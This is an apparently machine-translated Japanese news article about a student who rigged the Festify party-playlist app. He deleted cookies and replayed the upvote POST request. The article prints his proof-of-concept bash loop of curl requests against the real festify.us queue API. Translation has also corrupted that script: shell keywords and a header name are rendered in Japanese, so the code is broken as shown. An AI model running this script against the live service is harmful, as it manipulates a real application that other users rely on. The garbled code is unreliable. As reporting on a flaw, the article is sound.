オランダ人学生のロルフ・ルースさんは、人気の音楽プレーヤー「Festify」を使って、同窓会のパーティーを乗っ取る方法を発見した。
Roos 氏は、ウィンデスハイム応用科学大学の Gumbo Millennium フラタニティに所属しており、フラタニティの人々がクッキーや POST リクエストをキャプチャして操作し、自分たちの音楽を Festify のコミュニティ プレイリストのトップに投票して、アプリの中央制御を破る方法について詳しく説明しました。
パーティー参加者のスマートフォンでの投票に基づいて Spotify で最も人気のある曲が現在のプレイリストに選ばれるのを許可するのではなく、ルース氏は隅に集まってリストを乗っ取り、自分の曲がリストの大部分を占めるようにできることに気付いた。
「Festifyはクッキーを使ってユーザーの投票を登録し、自分の音楽を他の人に強制できないようにしています」とルース氏は言う。
「曲をキューに追加した後は、投票できません。しかし、これは簡単に解決できます。」
Cookieを削除し、ハードリフレッシュすると、追加した曲にアップ投票できるようになります。Chromeデベロッパーツールを使えば、曲にアップ投票するPOSTリクエストをキャプチャできます。
概念実証。
Roos 氏は、パーティー ハッカーが cURL リクエストを編集して Cookie を削除し、スクリプトに組み込む方法を示しました。
| #!/bin/bash x=1 while [ $x -le 99 ] do echo "$x 回賛成投票しました"
curl 'http://festify.us/api/parties/57d16e88a27dd0a66ec/queue' -H 'Origin: http://festify.us' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-GB,en-US;q=0.8,en;q=0.6' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36' -H 'Content-Type: application/json;charset=UTF-8' -H 'Accept: application/json, text/plain, */*' -H 'Referer: http://festify.us/57d16e88a27dd0a66ec' -H '接続: keep-alive' --data-binary '{"name":"Afro Circus/I Like To Move It","spotifyID":"0qNBowxGCvy2mSbg9kmEua"}' --compressed x=$(( $x + 1 )) 完了 「アフロ」をエコー |
|---|
ハッカーは、今後学生クラブのパーティーへの参加を禁止されるかどうかについては言及しなかった。®
